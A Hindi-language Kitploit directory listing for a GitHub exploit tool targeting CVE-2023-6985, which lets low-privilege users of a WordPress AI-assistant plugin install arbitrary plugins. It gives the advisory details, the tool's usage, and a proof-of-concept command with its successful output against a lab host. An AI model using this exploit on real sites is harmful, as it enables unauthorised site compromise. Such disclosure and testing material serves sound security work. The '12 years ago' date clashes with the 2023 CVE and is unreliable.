Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-6985 — 10Web AI Assistant – AI सामग्री लेखन सहायक <= 1.0.18 - प्रमाणित (Subscriber+) उपयोगकर्ताओं के लिए प्राधिकरण की कमी से मनमाना प्लगइन इंस्टॉलेशन/सक्रियण विवरण | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2023-6985
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणगलत कॉन्फ़िगरेशन
GitHubrandomrobbiebf/cve-2023-6985

CVE-2023-6985

10Web AI Assistant – AI सामग्री लेखन सहायक <= 1.0.18 - प्रमाणित (Subscriber+) उपयोगकर्ताओं के लिए प्राधिकरण की कमी से मनमाना प्लगइन इंस्टॉलेशन/सक्रियण विवरण

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6985

10Web AI Assistant – AI लेखन सहायक <= 1.0.18 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए अनधिकृत प्लगइन इंस्टॉलेशन/सक्रियण के लिए प्राधिकरण की कमी

विवरण

WordPress के लिए 10Web AI Assistant – AI लेखन सहायक प्लगइन में, संस्करण 1.0.18 तक और सहित सभी संस्करणों में, install_plugin AJAX क्रिया पर एक गुम क्षमता जांच के कारण डेटा में अनधिकृत संशोधन की संभावना है। यह प्रमाणित हमलावरों के लिए, सब्सक्राइबर-स्तरीय पहुंच और ऊपर के साथ, मनमाने प्लगइन्स स्थापित करना संभव बनाता है जिनका उपयोग समझौता किए गए साइट तक और पहुंच प्राप्त करने के लिए किया जा सकता है।

root@kitploit:~
गंभीरता: मध्यम
CVE ID: CVE-2023-6985
CVSS स्कोर: 6.5
CVSS मीट्रिक्स: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
प्लगइन स्लग: ai-assistant-by-10web
WPScan URL: https://www.wpscan.com/plugin/ai-assistant-by-10web
संदर्भ URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/229245a5-468d-47b9-8f26-d23d593e91da
अंतर URL: https://plugins.trac.wordpress.org/changeset/3027004/ai-assistant-by-10web/trunk/ai-assistant-by-10web.php
डाउनलोड करें: https://downloads.wordpress.org/plugin/ai-assistant-by-10web.1.0.18.zip

उपयोग कैसे करें

root@kitploit:~
python3 CVE-2023-6985.py -h
usage: CVE-2023-6985.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG --php PHP

10Web AI Assistant – AI लेखन सहायक <= 1.0.18 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए अनधिकृत प्लगइन इंस्टॉलेशन/सक्रियण के लिए प्राधिकरण की कमी CVE-2023-6985 - WordPress के लिए 10Web AI Assistant – AI लेखन सहायक प्लगइन में, संस्करण 1.0.18 तक और सहित सभी संस्करणों में, `install_plugin` AJAX क्रिया पर एक गुम क्षमता जांच के कारण डेटा में अनधिकृत संशोधन की संभावना है। यह प्रमाणित हमलावरों के लिए, सब्सक्राइबर-स्तरीय पहुंच और ऊपर के साथ, मनमाने प्लगइन्स स्थापित करना संभव बनाता है जिनका उपयोग समझौता किए गए साइट तक और पहुंच प्राप्त करने के लिए किया जा सकता है।

विकल्प:
  -h, --help           यह सहायता संदेश दिखाएं और बाहर निकलें
  --url URL            WordPress साइट का URL
  --username USERNAME  WordPress उपयोगकर्ता नाम
  --password PASSWORD  WordPress पासवर्ड
  --slug SLUG          WordPress प्लगइन स्लग
  --php PHP            WordPress प्लगइन PHP फ़ाइल

POC

root@kitploit:~
python3 CVE-2023-6985.py --url http://wordpress.lan --username user --password useruser1 --slug display-php-version --php display-php-version.php
सफलतापूर्वक लॉग इन किया गया।
REST API नॉन्स प्राप्त हो रहा है!
नॉन्स मिला: df8390ff4b
प्लगइन स्थापित किया जा रहा है
https://downloads.wordpress.org/plugin/display-php-version.latest-stable.zip से इंस्टॉलेशन पैकेज डाउनलोड किया जा रहा है
पैकेज अनज़िप किया जा रहा है
प्लगइन स्थापित किया जा रहा है
प्लगइन सफलतापूर्वक स्थापित हुआ।
{"success":true}
टूल डाउनलोड करें